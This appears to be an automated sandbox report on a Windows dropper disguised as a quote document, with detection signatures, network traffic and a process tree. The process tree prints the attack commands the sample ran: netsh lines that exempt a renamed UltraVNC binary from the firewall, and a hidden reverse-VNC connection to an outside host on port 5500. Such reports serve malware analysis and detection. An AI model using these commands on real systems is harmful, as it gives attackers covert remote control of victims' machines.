Edit tour

Windows Analysis Report
Preventivo24.01.11.exe

Overview

General Information

Sample name:	Preventivo24.01.11.exe
Analysis ID:	1379424
MD5:	32f35b78a3dc5949ce3c99f2981def6b
SHA1:	18a24aa0ac052d31fc5b56f5c0187041174ffc61
SHA256:	0cb44c4f8273750fa40497fca81e850f73927e70b13c8f80cdcfee9d1478e6f3
Tags:	exe
Infos:

Detection

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Contains VNC / remote desktop functionality (version string found)

Contains functionalty to change the wallpaper

Modifies the windows firewall

Uses cmd line tools excessively to alter registry or file data

Uses netsh to modify the Windows network and firewall settings

Binary contains a suspicious time stamp

Checks for available system drives (often done to infect USB drives)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops certificate files (DER)

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

May use bcdedit to modify the Windows boot settings

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Uses taskkill to terminate processes

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

Preventivo24.01.11.exe (PID: 5924 cmdline: C:\Users\user\Desktop\Preventivo24.01.11.exe MD5: 32F35B78A3DC5949CE3C99F2981DEF6B)

msiexec.exe (PID: 7216 cmdline: C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706008514 " AI_EUIMSI=" MD5: 9D09DC1EDA745A5F87553048E57620CF)

viewer.exe (PID: 7424 cmdline: C:\Games\viewer.exe" /HideWindow "C:\Games\cmmc.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0)

cmd.exe (PID: 7468 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7528 cmdline: C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 7556 cmdline: C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

reg.exe (PID: 7576 cmdline: Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

WMIC.exe (PID: 7592 cmdline: wmic process where (name="taskhost.exe") get commandline MD5: E2DE6500DE1148C7F6027AD50AC8B891)

findstr.exe (PID: 7600 cmdline: findstr /i "taskhost.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

Acrobat.exe (PID: 7676 cmdline: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 7932 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 7212 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1752,i,9597563481280373609,10748529696492250759,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

viewer.exe (PID: 7704 cmdline: C:\Games\viewer.exe /HideWindow C:\Games\c.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0)

cmd.exe (PID: 7876 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mode.com (PID: 8000 cmdline: Mode 90,20 MD5: FB615848338231CEBC16E32A3035C3F8)

cmd.exe (PID: 7536 cmdline: C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 7640 cmdline: C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

reg.exe (PID: 7804 cmdline: Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

cmd.exe (PID: 7628 cmdline: C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 7804 cmdline: cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

mode.com (PID: 2840 cmdline: Mode 90,20 MD5: FB615848338231CEBC16E32A3035C3F8)

netsh.exe (PID: 2132 cmdline: netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

netsh.exe (PID: 5924 cmdline: netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

WMIC.exe (PID: 8216 cmdline: wmic process where (name="taskhost.exe") get commandline MD5: E2DE6500DE1148C7F6027AD50AC8B891)

findstr.exe (PID: 8244 cmdline: findstr /i "taskhost.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

taskhost.exe (PID: 8488 cmdline: C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run MD5: 663FE548A57BBD487144EC8226A7A549)

viewer.exe (PID: 8508 cmdline: C:\Games\viewer.exe /HideWindow C:\Games\once.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0)

cmd.exe (PID: 8600 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

viewer.exe (PID: 8516 cmdline: C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0)

cmd.exe (PID: 8608 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8704 cmdline: C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 8724 cmdline: C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

reg.exe (PID: 8740 cmdline: Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

timeout.exe (PID: 8540 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 8960 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 9108 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 2840 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 8456 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 7800 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

taskkill.exe (PID: 7968 cmdline: taskkill /im rundll32.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

timeout.exe (PID: 736 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

taskkill.exe (PID: 888 cmdline: taskkill /im rundll32.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

timeout.exe (PID: 8004 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

taskkill.exe (PID: 8400 cmdline: taskkill /im rundll32.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

timeout.exe (PID: 8444 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cleanup

Snort Signatures

ETPRO MALWARE Observed Suspicious UA (AdvancedInstaller) - Source IP: 192.168.2.5 - Destination IP: 93.184.216.34

Timestamp:	192.168.2.593.184.216.3449705802834928 01/23/24-12:07:53.684308
SID:	2834928
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Preventivo24.01.11.exe

Virustotal: Detection: 17%

Perma Link

Source: Preventivo24.01.11.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: Preventivo24.01.11.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: wininet.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp, shi6E82.tmp.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdbGCTL source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\Windows-driver-samples-master\video\UVncVirtualDisplay\Release\UVncVirtualDisplay.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, UVncVirtualDisplay.dll.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb! source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\vnchooks.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source:	Binary string: wininet.pdbUGP source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp, shi6E82.tmp.0.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000006.00000000.1690846297.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000006.00000002.1875272128.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000002.3495250511.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000000.1747475344.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000002.1871122900.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000000.1862131314.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.1877402564.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.1863267198.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbd source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr, MSI6F00.tmp.0.dr, MSI6FDC.tmp.0.dr, MSI6FFC.tmp.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: Preventivo24.01.11.exe
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb0 source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000006.00000000.1690846297.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000006.00000002.1875272128.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000002.3495250511.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000000.1747475344.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000002.1871122900.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000000.1862131314.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.1877402564.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.1863267198.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: z:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: x:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: v:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: t:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: r:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: p:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: n:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: l:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: j:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: h:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: f:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: b:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: y:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: w:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: u:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: s:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: q:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: o:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: m:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: k:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: i:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: g:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: e:
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: a:

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FE9080 FindFirstFileW,FindClose,CloseHandle,CloseHandle,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EA5220 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,PathIsUNCW,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FBD700 FindFirstFileW,GetLastError,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_01008B30 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FBCDD0 FindFirstFileW,FindFirstFileW,FindClose,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FE3210 FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00F9F570 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FF3790 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FF3C10 FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FCBFF0 FindFirstFileW,FindClose,FindClose,
Source: C:\Games\taskhost.exe	Code function: 41_2_000BEC90 GetDlgItem,GetModuleFileNameA,_strrchr,FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00FF2400 GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection,

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\c.cmd
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmmc.cmd
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmd.txt
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2834928 ETPRO MALWARE Observed Suspicious UA (AdvancedInstaller) 192.168.2.5:49705 -> 93.184.216.34:80

Source: global traffic

TCP traffic: 192.168.2.4:49749 -> 140.228.29.110:5500

Source: Joe Sandbox View	IP Address: 52.202.204.11 52.202.204.11
Source: Joe Sandbox View	IP Address: 93.184.216.34 93.184.216.34
Source: Joe Sandbox View	IP Address: 93.184.216.34 93.184.216.34

Source: global traffic	HTTP traffic detected: OPTIONS /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RO&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-aliveAccept: /Access-Control-Request-Method: GETAccess-Control-Request-Headers: x-adobe-uuid,x-adobe-uuid-type,x-api-keyOrigin: https://rna-resource.acrobat.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Mode: corsSec-Fetch-Site: cross-siteSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RO&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01x-adobe-uuid: a4ecfc44-3976-4051-8c45-0a7e26b55a37x-adobe-uuid-type: visitorIdx-api-key: AdobeReader9sec-ch-ua-platform: "Windows"Origin: https://rna-resource.acrobat.comAccept-Language: en-US,en;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, br
Source: global traffic	HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT

Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
